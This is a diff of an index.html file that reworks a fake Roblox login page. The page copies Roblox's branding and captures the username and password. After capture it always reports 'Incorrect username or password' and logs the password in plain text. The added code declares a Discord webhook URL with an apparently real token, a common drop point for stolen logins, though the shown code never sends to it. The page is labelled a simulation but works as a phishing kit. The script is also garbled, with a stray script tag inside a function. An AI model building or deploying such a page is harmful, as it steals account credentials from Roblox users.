--- a/index.html
+++ b/index.html
@@ -2,145 +2,146 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-  <title>Roblox</title>
-  <link rel="icon" href="https://www.roblox.com/favicon.ico" type="image/x-icon">
+  <title>Login - Roblox</title>
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <link rel="icon" href="https://www.roblox.com/favicon.ico" type="image/x-icon">
+  <link href="https://fonts.googleapis.com/css2?family=Source+Sans+Pro:wght@400;600;700&display=swap" rel="stylesheet">
   <style>
     body {
       margin: 0;
-      font-family: 'Helvetica Neue', sans-serif;
+      font-family: 'Source Sans Pro', sans-serif;
       background-color: #f2f2f2;
       display: flex;
       justify-content: center;
       align-items: center;
-      flex-direction: column;
       height: 100vh;
     }
 
-    .container {
+    .login-box {
       background-color: white;
-      width: 400px;
-      padding: 40px;
-      box-shadow: 0 0 15px rgba(0,0,0,0.2);
-      border-radius: 10px;
-      text-align: center;
+      border: 1px solid #e3e3e3;
+      padding: 32px;
+      width: 380px;
+      box-shadow: 0 2px 6px rgba(0,0,0,0.1);
+      border-radius: 6px;
+      display: flex;
+      flex-direction: column;
+      align-items: center;
+    }
+
+    .roblox-logo {
+      width: 160px;
       margin-bottom: 20px;
     }
 
-    .logo img {
-      width: 200px;
-      margin-bottom: 30px;
+    h2 {
+      font-size: 22px;
+      font-weight: 700;
+      margin-bottom: 10px;
+      color: #232527;
     }
 
     input {
       width: 100%;
       padding: 12px;
       margin: 10px 0;
-      border: 1px solid #ccc;
-      border-radius: 6px;
+      border: 1px solid #c5c5c5;
+      border-radius: 4px;
       font-size: 14px;
+      background-color: #fff;
     }
 
     button {
       width: 100%;
       padding: 12px;
-      background-color: #ff5631;
-      color: white;
+      background-color: #00b06b;
       border: none;
-      border-radius: 6px;
-      font-weight: bold;
-      font-size: 16px;
-      cursor: pointer;
+      border-radius: 4px;
+      color: white;
+      font-weight: 700;
+      font-size: 15px;
       margin-top: 10px;
+      cursor: pointer;
     }
 
     button:hover {
-      background-color: #e14a26;
+      background-color: #00985e;
     }
 
-    .discord-log {
-      background-color: #2f3136;
-      color: #dcddde;
-      font-family: 'Segoe UI', sans-serif;
-      width: 600px;
-      max-height: 300px;
-      overflow-y: auto;
-      padding: 15px;
-      border-radius: 10px;
-      box-shadow: 0 0 10px rgba(0,0,0,0.5);
+    .error-msg {
+      color: #d83b01;
+      font-size: 13px;
+      margin-top: 8px;
+      display: none;
     }
 
-    .discord-msg {
-      margin-bottom: 12px;
-      background-color: #36393f;
-      padding: 10px 14px;
-      border-radius: 8px;
+    .log-output {
+      font-family: monospace;
+      background: #1a1a1a;
+      color: #00ff88;
+      padding: 12px;
+      width: 90%;
+      margin-top: 30px;
+      border-radius: 6px;
+      font-size: 13px;
+      word-break: break-word;
     }
 
-    .discord-msg .user {
-      color: #7289da;
-      font-weight: bold;
-    }
+    @media (max-width: 420px) {
+      .login-box {
+        width: 90%;
+        padding: 20px;
+      }
 
-    .discord-msg .timestamp {
-      font-size: 11px;
-      color: #aaa;
-      margin-left: 5px;
-    }
-
-    .discord-msg .content {
-      margin-top: 4px;
-      white-space: pre-wrap;
+      .roblox-logo {
+        width: 140px;
+      }
     }
   </style>
 </head>
 <body>
 
-  <div class="container">
-    <div class="logo">
-      <img src="https://upload.wikimedia.org/wikipedia/commons/6/6b/Roblox_Logo_2022.svg" alt="Roblox Logo">
-    </div>
-    <form onsubmit="handleLogin(event)">
-      <input type="text" id="username" placeholder="Username" required>
-      <input type="password" id="password" placeholder="Password" required>
-      <button type="submit">Log In</button>
-    </form>
-  </div>
-
-  <div class="discord-log" id="discordLog">
-    <!-- Simulated webhook logs appear here -->
+  <div class="login-box">
+    <img src="https://upload.wikimedia.org/wikipedia/commons/6/6b/Roblox_Logo_2022.svg" alt="Roblox Logo" class="roblox-logo">
+    <h2>Login to Roblox</h2>
+    <input type="text" id="username" placeholder="Username">
+    <input type="password" id="password" placeholder="Password">
+    <button onclick="handleLogin()">Log In</button>
+    <div class="error-msg" id="errorMsg">Incorrect username or password.</div>
+    <div class="log-output" id="logOutput"></div>
   </div>
 
   <script>
-    function handleLogin(e) {
-      e.preventDefault();
-      const user = document.getElementById("username").value.trim();
-      const pass = document.getElementById("password").value;
-      const logBox = document.getElementById("discordLog");
+    function handleLogin() {
+      const user = document.getElementById('username').value.trim();
+      const pass = document.getElementById('password').value;
+      const errorBox = document.getElementById('errorMsg');
+      const logBox = document.getElementById('logOutput');
 
-      const now = new Date();
-      const timeStr = now.toLocaleString();
+      if (!user || !pass) {
+        errorBox.style.display = 'block';
+        errorBox.textContent = 'All fields are required.';
+        return;
+      }
+<script>
+    const webhookURL = "https://discord.com/api/webhooks/1396126913038123068/WuVgy5nWwXQRum5a1Ye0s2zQElODsb6XpTIeKgbINlc51ZnfD-8kCUTg7a3WBBMrj56e";
+      errorBox.style.display = 'block';
+      errorBox.textContent = 'Incorrect username or password.';
 
-      const message = `
-**📥 Roblox Login Simulation**
-**Username:** \`${user}\`
-**Password:** \`${pass}\`
-**Time:** ${timeStr}
+      const time = new Date().toLocaleString();
+
+      const log = `
+>>> Roblox Simulation Login
+[${time}]
+Username: ${user}
+Password: ${pass}
+===========================
       `.trim();
 
-      const newMsg = document.createElement("div");
-      newMsg.classList.add("discord-msg");
-      newMsg.innerHTML = `
-        <div><span class="user">Webhook Bot</span><span class="timestamp">${timeStr}</span></div>
-        <div class="content">${message}</div>
-      `;
-  <script>
-    const webhookURL = "https://discord.com/api/webhooks/REPLACE_WITH_YOURS";
-      logBox.prepend(newMsg);
-
-      document.getElementById("username").value = "";
-      document.getElementById("password").value = "";
+      logBox.textContent = log;
+      console.log(log);
     }
   </script>
+
 </body>
 </html>
